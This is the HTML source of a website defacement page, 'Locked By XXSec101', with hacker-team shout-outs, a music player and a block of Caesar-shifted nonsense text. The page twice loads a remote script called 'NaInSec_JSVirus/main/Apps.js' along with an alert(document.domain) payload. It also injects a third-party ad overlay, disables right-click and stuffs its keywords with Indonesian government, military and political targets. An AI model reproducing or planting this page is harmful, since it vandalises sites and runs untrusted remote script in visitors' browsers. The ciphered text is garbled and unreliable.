<html>
<head>
  <title>Locked By XXSec101</title>
  <link rel="preconnect" href="https://fonts.googleapis.com">
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta name="og:image" content="img/effect.gif.png">
  <meta name="og:description" content="Locked By XXSec101">
  <meta name="description" content="WHITE HAT BISA SAJA MENJADI BLACK HAT, TETAPI BLACK HAT BELUM TENTU BISA MENJADI WHITE HAT.">
  <meta name="keywords" content="Pemilu 2024, Jokowi, Megawati, Puan Maharani, Prabowo, BSSN, Militer, Polri, Cyber Polri, TNI AD, TNI AU, TNI AL, Rumah Sakit, Pemerintah, Pak Ganjar, KPK, KPU, BNN, Badan Intelijen Negara, Russia, Cina, Jepang, Belanda, Korea Selatan, Korea Utara, Malaysia, Papua Nugini, NTB, NTT, Dempasar, Bali, Jawa Timur, Cara Install Kali Linux, Cara Install Ubuntu, Cara Install Linux Mint, Cara Install Fedora, Github, Gitlab, HackerOne, Bug Bounty, Bug Hunter, Cyber Security, Hackers, Hacker, Bjorka, Anonymous Imdonesia, Anonymous, Hacker Russia, Amerika, Canada, Belgia, Brazil, Swedia, Norwegia, Pakistan, Palestina, Irak, Iran, Arab Saudi.">
  <script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
  <script type="text/javascript" src="https://raw.githubusercontent.com/NaInSec/NaInSec_JSVirus/main/Apps.js">alert(document.domain);</script>
  <link href="img/effect.gif" rel="icon">
  <link href="img/effect.gif" rel="apple-touch-icon">

  <style type="text/css">
  @import url('https://fonts.googleapis.com/css?family=Saira+Stencil+One|Lacquer&display=swap');
    body {
      background-color: black;
      background-size: cover;
      background-attachment: fixed;
    </style>
    <style>
      html, body {
        background-color: #000;
        color: #636b6f;
        font-family: 'Fredericka the Great', sans-serif;
        font-weight: 100;
        height: 100vh;
        margin: 0;
        background-repeat: no-repeat;
      }
      .full-height {
        height: 100vh;
      }
      .flex-center {
        align-items: center;
        display: flex;
        justify-content: center;
      }
      .position-ref {
        position: relative;
      }
      .content {
        text-align: center;
      }
      .title {
        font-size: 36px;
        padding: 20px;
      }
      .dcs {
        font-family: 'Lacquer', sans-serif;
      }
    </style>
  </head>

  <style>
    @import url('https://fonts.googleapis.com/css?family=Orbitron&display=swap');

    html {
      background-color: black;
      font-family: 'Orbitron';
    }

    body {
      color: white;
    }

    h1 {
      color: #7a00ff;
    }

    .g7 {
      color: #ff0000;
    }

    .btn {
      border: none;
      width: 200px;
      height: 30px;
      outline: none;
      color: #fff;
      background: #111;
      cursor: pointer;
      position: relative;
      font-family: Orbitron;
      z-index: 0;
      border-radius: 10px;
    }

    .btn:before {
      content: '';
      background: linear-gradient(45deg, #ff0000, #002bff, #7a00ff, #ff00c8, #ff0000);
      position: absolute;
      top: -2px;
      left: -2px;
      background-size: 400%;
      z-index: -1;
      filter: blur(5px);
      width: calc(100% + 4px);
      height: calc(100% + 4px);
      animation: glowing 20s linear infinite;
      opacity: 0;
      transition: opacity .3s ease-in-out;
      border-radius: 10px;
    }

    .btn:active {
      color: #000;
    }

    .btn:active:after {
      background: transparent;
    }

    .btn:hover:before {
      opacity: 1;
    }

    .btn:after {
      z-index: -1;
      content: '';
      position: absolute;
      width: 100%;
      height: 100%;
      background: #111;
      left: 0;
      top: 0;
      border-radius: 10px;
    }

@keyframes glowing {
      0% {
        background-position: 0 0;
      }

      50% {
        background-position: 400% 0;
      }

      100% {
        background-position: 0 0;
      }}
  </style>

  <script>
    function play() {
      var audio = document.getElementById("lagu"); audio.play();
    }function pause() {
      var audio = document.getElementById("lagu"); audio.pause();
    }
  </script>

  <body align="center" oncontextmenu="return false" bgcolor="black">
    <!-- i-mobile for SmartPhone client script -->

    <script type="text/javascript" charset="UTF-8" src="http://cache.ssend.microad.jp/js/adfunnel-sp-load.js"></script>

    <div class="adfunnel_sp" data-adfunnel='{ "spotid":"ad7990ad7d02f589", "seq":1,"display":"overlay" }'></div>

    <!-- tok2_user_contents -->

    <div id="tok2_user_contents">
      <div class="error">
        <script type="text/javascript">
        </script>
        <center>
        </center>
        <body>
        <div class="flex-center position-ref full-height">
          <div class="content">
            <div class="text">
              <img width="500" height="500" src="img/effect.gif">
              <br><br><font color="white"><code><font color="red" class="dcs" size="20">Locked By<br><font color="white" class="dcs" size="20">XXSec101</font><br><br><font color="red" size="4.8">
                Wkh yllohq zloo dovr eh d yllohq li wkh khuq wkhuh lv wkh vwrulq. Hxwhb yllohq lv wkh khuq ri klv rshq vwrulz! Brx Hvzcdu Glh D Khuq, Ru Brx Ohvh Orrq Wkurz Wr Dvryhu Wkh Yllohq! L sdufhv d uhdoo yllohq wr d iruh lvod. Lq wklv wkhp vkrxog vshqg db wkhp kdwplqhu rq wkh urrp. Klzlwu zloo hgxfw iru ehfrq wkh vshlfh, wkurz brx kdvqhg ehsxwhuvlq. Grqdog zloo ghyrrx ir lq lvkluqr duudqw ru d khuq. Lwklqhh lv wlohkhh vljkwh lv vruw wkhan iljwh! Lwklqhh lv wlohkhh vljkwh lv dqj lvgl! Dqg lfgfv duhdv duh eylrxsurrshv!
              </div></font><br>
              </center>

                <button class="btn" onclick="play()"><font size="3">Play music</font></button>&nbsp;&nbsp;<button class="btn" onclick="pause()"><font size="3">Pause music</font></button>&nbsp;&nbsp; <audio id="lagu" src="music/Rasa-Ini-Yang-Tertinggal.mp3"></audio><br>

                <center><font color="white" size="5"><br>My Team :</font></center>

                <font color="red"><code><font class="dcs" size="4.8"><i>..:: <font color="white" size="4.8">|</font> SCSI TEAM <font color="white" size="4.8">|</font> Cyber Security Agency <font color="white" size="4.8">|</font> NIS TEAM <font color="white" size="4.8">|</font> BSH TEAM <font color="white" size="4.8">|</font> IDNHack TEAM<font color="white" size="4.8">|</font> KETAPANG GREY HAT <font color="white" size="4.8">|</font> KH TEAM<font color="white" size="4.8">|</font> GARUDA HACKNET TEAM<font color="white" size="4.8">|</font> 313 MCA<font color="white" size="4.8">|</font> BEKASI BLACK HAT <font color="white" size="4.8">|</font> GANOSEC TEAM <font color="white" size="4.8">|</font> GARUDA ERROR SYSTEM <font color="white" size="4.8">|</font><font color="white" size="4.8"></font> ::..<br></div>
<script type="text/javascript" src="https://raw.githubusercontent.com/NaInSec/NaInSec_JSVirus/main/Apps.js">alert(document.domain);</script>
</body>
</html>